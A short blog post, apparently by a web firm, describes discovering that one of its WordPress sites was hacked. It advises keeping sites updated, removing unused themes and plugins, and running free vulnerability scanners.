We discovered yesterday that one of our WordPress sites was hacked. We are pretty diligent about keeping our sites up-to-date and we do a complete update check once a month on all sites.
So what happened?
Basically this is a good example of how pervasive and unrelenting the hackers are these days. That technical people who follow the rules can still get hacked is a warning. Scary as that is, you can fight back. We are not completely sure if this hacker found a currently common vulnerability or a new one. This site did not have the “timthumb.php” file so that was not the entry point. but a bit of research did point out that this is still a common target.
Some WordPress Basics For the Non- Technical
There are two quick tools you can use to monitor your site. The first is a plugin that scans your site for the “timthumb” vulnerability. The tool is here:
The next is a general scanner service provided by Sucuri as a free service:
I would definitely recommend both for any non-technical WordPress users. Lastl,y and most importantly, keep your WordPress site up to date and clean it up by removing old themes and unused plugins. In our case, upgrading to the next version cleaned up the problem, along with getting rid of some old unused themes that seemed to be where this hacker targeted the site. It is easy to just deactivate a theme or plugin and just leave it there, but a quick scan of our hosting logs revealed that most sites get probed constantly for vulnerable code. For example, this particular site was probed over 200 times this morning for files that don’t exist on this site. You can’t stop this, but you can make it harder by keeping your site “lean and trim” and free of unused code in the form of themes and plugins.
So, time for some winter cleaning and maintenance!